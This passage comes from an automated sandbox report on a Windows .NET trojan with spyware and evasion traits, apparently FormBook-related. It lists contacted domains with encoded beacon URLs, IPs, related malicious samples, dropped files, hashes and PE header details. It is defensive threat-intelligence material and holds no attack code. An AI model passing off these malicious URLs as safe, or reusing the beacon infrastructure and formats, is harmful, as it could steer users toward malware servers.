                                            http://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHifalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bosonserver.net/x10g/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.accessoriestechbd.com/5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0=false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hourglasspoise.net/5gvb/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.accelbusiness.net/sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E=false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.theiconsummit.life/6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHifalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabmcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.com/designersGdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygamcbuilder.exe, 00000008.00000002.3493562644.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.000000000320A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/?dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/bThedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers?dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.tiro.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.goodfont.co.krdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.accessoriestechbd.comfgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.typography.netDdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/cThedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleasedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sandoll.co.krdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleasedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cndGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comdGHiTqj3AB.exe, 00000000.00000002.1757032878.0000000005630000.00000004.00000020.00020000.00000000.sdmp, dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.ecosia.org/newtab/mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/mcbuilder.exe, 00000008.00000002.3493562644.00000000044A6000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.0000000002EE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comldGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cndGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-user.htmldGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              195.200.3.58
                                              		bosonserver.netUnited Kingdom
                                              		8897KCOM-SPNService-ProviderNetworkex-MistralGBfalse
                                              103.29.180.74
                                              		accessoriestechbd.comunknown
                                              		4686BEKKOAMEBEKKOAMEINTERNETINCJPfalse
                                              3.33.130.190
                                              		hourglasspoise.netUnited States
                                              		8987AMAZONEXPANSIONGBfalse
                                              217.160.164.240
                                              		asymtos.techGermany
                                              		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                              203.161.42.162
                                              		www.lontos.topMalaysia
                                              		45899VNPT-AS-VNVNPTCorpVNfalse

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1483009
                                              Start date and time:2024-07-26 13:54:28 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:dGHiTqj3AB.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:1f5c95d40c06c01300f0a6592945a72d.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@9/2@7/5
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 92%
                                              • Number of executed functions: 100
                                              • Number of non-executed functions: 286
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • VT rate limit hit for: dGHiTqj3AB.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              07:57:08API Interceptor3808582x Sleep call for process: mcbuilder.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3.33.130.190SecuriteInfo.com.Win32.RATX-gen.11894.20893.exeGet hashmaliciousFormBookBrowse
                                              • www.rs-alohafactorysaleuua.shop/gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl
                                              OPEN BALANCE.exeGet hashmaliciousFormBookBrowse
                                              • www.kawambwa-sugar.com/gjm3/
                                              LisectAVT_2403002B_179.exeGet hashmaliciousUnknownBrowse
                                              • knowledgesutra.com/img/temp/head.png?pr=gJ4WK%2FSUh%2FzMhRMw9YLJ8MSTUivqg4b8xZNUK%2B%2FbxWq1SfkIYQgN
                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                              • www.voltvanbage.com/ty31/?nfuxZr=pvoYkEQqz69527F4Qhx2M+MeCU1a+z7bzQV0Ei+DgnmcPIGjoq6QmApJNCtoApqDhYhBEB02Pg==&v6AxO=1bjHLvGh8ZYHMfZp
                                              stock request.exeGet hashmaliciousFormBookBrowse
                                              • www.nofor36.org/144n/
                                              LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.emplealegal.com/hfhf/?6lBX5p6=ct9WsoIrMyG15BIb/aeJjsCOPIOlNMtYEwl7br9XhYnpuK8wszquVgiJVEddqIG+KiEl&Kjsl=FbuD_t_HwtJdin
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • www.primerpaintjobs.com/d5fo/
                                              irlsever.docGet hashmaliciousFormBookBrowse
                                              • www.gotvoom.pro/yagd/
                                              LisectAVT_2403002C_89.exeGet hashmaliciousFormBookBrowse
                                              • www.hoppehour.com/hsot/?Gxlpd=wG2o1At+WZieObprlK4gt3or+R79FqGo8JWOautkSwtC0gaL3bnAN483BIjKb3NjufvQaHXgKA==&5j=Sjth
                                              rFormulariodeso.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.thepicklematch.com/pz12/?gv5=vWouWvmgWIWqsm7oCOFCcA3ZS+Agm3dOahf/0vyzNNVjrAYqm8JklOZclUMVobs+3i1F&tVj0=J48xD
                                              203.161.42.162irlsever.docGet hashmaliciousFormBookBrowse
                                              • www.a48s.online/rozg/

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              BEKKOAMEBEKKOAMEINTERNETINCJP7OFBdUtXsK.elfGet hashmaliciousMiraiBrowse
                                              • 202.210.131.232
                                              jew.mips.elfGet hashmaliciousMiraiBrowse
                                              • 218.225.239.30
                                              MRnwgdHLYk.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 103.227.8.175
                                              gtMzliIYIc.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 218.225.239.31
                                              Account_Verification.htmGet hashmaliciousUnknownBrowse
                                              • 103.29.183.164
                                              jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 103.20.8.19
                                              wget.elfGet hashmaliciousGafgytBrowse
                                              • 103.20.8.67
                                              sh.elfGet hashmaliciousGafgytBrowse
                                              • 103.248.71.128
                                              SO8J3K15us.elfGet hashmaliciousGafgytBrowse
                                              • 103.20.8.54
                                              hOBk4rf0Jm.elfGet hashmaliciousGafgytBrowse
                                              • 103.20.8.37
                                              KCOM-SPNService-ProviderNetworkex-MistralGB92.249.48.47-skid.m68k-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 86.54.204.144
                                              appdrivesound.exeGet hashmaliciousSystemBCBrowse
                                              • 194.164.28.140
                                              yHIoCL9LQV.elfGet hashmaliciousMiraiBrowse
                                              • 86.54.83.146
                                              SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exeGet hashmaliciousUnknownBrowse
                                              • 194.164.71.123
                                              SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exeGet hashmaliciousUnknownBrowse
                                              • 194.164.71.123
                                              Fatura.pdfGet hashmaliciousUnknownBrowse
                                              • 195.200.3.3
                                              arm5-20240709-0417.elfGet hashmaliciousMiraiBrowse
                                              • 159.15.236.41
                                              Fatura.pdfGet hashmaliciousUnknownBrowse
                                              • 195.200.3.3
                                              http://waitrose.50sites.co.ukGet hashmaliciousUnknownBrowse
                                              • 194.164.28.26
                                              https://bpecuniaimmobili.com/J0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MzY/Get hashmaliciousUnknownBrowse
                                              • 195.200.3.3
                                              AMAZONEXPANSIONGBSecuriteInfo.com.Win32.RATX-gen.11894.20893.exeGet hashmaliciousFormBookBrowse
                                              • 3.33.130.190
                                              OPEN BALANCE.exeGet hashmaliciousFormBookBrowse
                                              • 3.33.244.179
                                              http://att-108796-103800.weeblysite.com/Get hashmaliciousUnknownBrowse
                                              • 3.33.220.150
                                              http://telstra-107506.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                              • 52.223.40.198
                                              https://erratic-mellow-comte.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                              • 3.33.220.150
                                              http://telstra-107152.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                              • 52.223.40.198
                                              Jeffrey.laws Replay VM (01m27sec).docxGet hashmaliciousHTMLPhisherBrowse
                                              • 52.223.40.198
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 52.223.40.198
                                              LisectAVT_2403002B_179.exeGet hashmaliciousUnknownBrowse
                                              • 3.33.130.190
                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                              • 3.33.130.190
                                              ONEANDONE-ASBrauerstrasse48DEfile.exeGet hashmaliciousVidarBrowse
                                              • 82.165.57.155
                                              file.exeGet hashmaliciousSystemBCBrowse
                                              • 217.76.146.62
                                              LisectAVT_2403002A_257.exeGet hashmaliciousAgentTeslaBrowse
                                              • 213.165.67.102
                                              LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.157
                                              LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
                                              • 82.165.152.127
                                              LisectAVT_2403002B_302.exeGet hashmaliciousBdaejec, EmotetBrowse
                                              • 82.223.70.24
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • 217.76.156.252
                                              LisectAVT_2403002C_62.dllGet hashmaliciousEmotetBrowse
                                              • 87.106.46.107
                                              IIMG_00172424.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.230.215
                                              eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                              • 217.160.0.226

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dGHiTqj3AB.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Temp\6fI63K3E

                                              Download File
                                              Process:C:\Windows\SysWOW64\mcbuilder.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):0.9746603542602881
                                              Encrypted:false
                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.752827643333699
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:dGHiTqj3AB.exe
                                              File size:951'296 bytes
                                              MD5:1f5c95d40c06c01300f0a6592945a72d
                                              SHA1:79a217ed19833efcf640ffd8bb04803e9f30d6f4
                                              SHA256:434ec59b680788bae7f2935200a77e681cecbb517d853c6e6cf31f4cf112e5cc
                                              SHA512:3cd70090e071e43b22a3638d8cdf13874c5da34aff2cb314e170feda59d630594314f45708797d83a47ed645a7f07755ac10f4a438858e6673ce560fe5f57975
                                              SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                                              TLSH:5B1512507E9CEFA6D679C3F898B3928663F1623F8421DACD4FD260D71835F414660A8B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..f..............0..x............... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:90cececece8e8eb0

                                              Static PE Info

                                              General

                                              Entrypoint:0x4e961e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6696C660 [Tue Jul 16 19:13:36 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xe95c90x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x618.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xe6d280x54.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xe76240xe7800a80dc334650030aacdd3bdfacd3dc345False0.8819308517818575data7.760978166314589IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xea0000x6180x800d23b1ec2e2678d53ba82fe023e10eafdFalse0.33740234375data3.457849924964285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
